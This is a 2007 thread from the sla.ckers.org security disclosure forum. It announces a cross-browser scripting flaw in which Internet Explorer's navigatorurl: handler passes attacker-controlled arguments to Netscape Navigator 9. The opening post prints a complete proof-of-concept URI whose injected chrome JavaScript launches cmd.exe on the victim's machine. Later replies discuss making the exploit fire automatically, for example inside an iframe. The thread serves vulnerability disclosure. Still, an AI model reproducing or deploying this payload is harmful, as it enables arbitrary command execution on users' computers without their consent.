Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: nmcfeters
Date: July 14, 2007 12:26AM

I'm sure if you are looking at this, you've probably seen the research Rios and I have done over the past couple months take off with a few new full disclosure postings... well, I didn't want to leave you bored for the weekend. Remember Rios's and Thor's FirefoxURL?

Here's a quote from Rios about the subject:

"This URI basically allows us to use IE to spawn an instance of FireFox (if the user has recent version of firefox2 installed on the machine). Normally, this wouldn't be too big of an issue, however in this case, we can pass arbitrary arguments to the URI, which ultimately get passed to FireFox.exe. With this in mind, we can initiate an XSS if the user simply browses to my site with IE, and has a recent version of FireFox2 installed (XSS and CSRF apply)..... but WAIT.. it gets better... because we can control the arguments passed to FireFox.exe, we can do other fun things, like add a FireFox profile to the users machine (without user consent)."

And not to be outdone, here's my follow up of the same thing for Netscape Navigator 9, which uses navigatorurl: instead of firefoxurl:. This is Rios's original PoC for firefoxurl, all I did was change the firefox to navigator... how funny is that?

navigatorurl:test"%20-chrome%20"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)

Are we ready to stop pointing the finger yet? Seems like everyone is vulnerable.



Edited 1 time(s). Last edit at 07/14/2007 12:28AM by nmcfeters.

Options: ReplyQuote
Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: nmcfeters
Date: July 14, 2007 12:40AM

Anyone up for calling this the month of URI bugs?

Options: ReplyQuote
Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: Anonymous User
Date: July 14, 2007 04:41AM

Again nice one! (Impact: 35)



Edited 1 time(s). Last edit at 07/14/2007 04:41AM by .mario.

Options: ReplyQuote
Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: nmcfeters
Date: July 14, 2007 09:55AM

Thanks Mario. Been a bit suprised at the slow response to the Trillian stuff... guess we'll keep releasing.

Options: ReplyQuote
Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: Anonymous User
Date: July 14, 2007 10:31AM

Very much appreciated indeed!

Options: ReplyQuote
Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: nmcfeters
Date: July 16, 2007 01:27PM

Really suprised that this one hasn't got more attention... it's actually the same exact thing as the firefoxurl flaw that Rios posted earlier, just now its on Netscape Navigator 9. You can see the proof of concept link here: http://www.xs-sniper.com/sniperscope/IE-Pwns-Firefox.html

Totally suprising the response to these, suffice it to say that we have more that will be released shortly.

Options: ReplyQuote
Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: Anonymous User
Date: July 17, 2007 01:39AM

Did you send the stuff to the sec mailinglists and secunia? Maybe it would be interesting to see exploits for *nix too if possible. Also you could provide an exploit that auto fires (the 'I have to click on the link'-PoCs don't impress most users very much - no idea why).

Options: ReplyQuote
Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: nmcfeters
Date: July 17, 2007 05:30AM

Yeah, pretty stupid, I mean, its just as simple to put it in an <iframe> or something. I think we have submitted to secunia, we had at least one thing there.

Options: ReplyQuote
Re: Cross Browser Scripting 2 (IE pwns Netscape Navigator 9)
Posted by: Anonymous User
Date: July 17, 2007 11:13AM

Got my PM?

Options: ReplyQuote


Sorry, only registered users may post in this forum.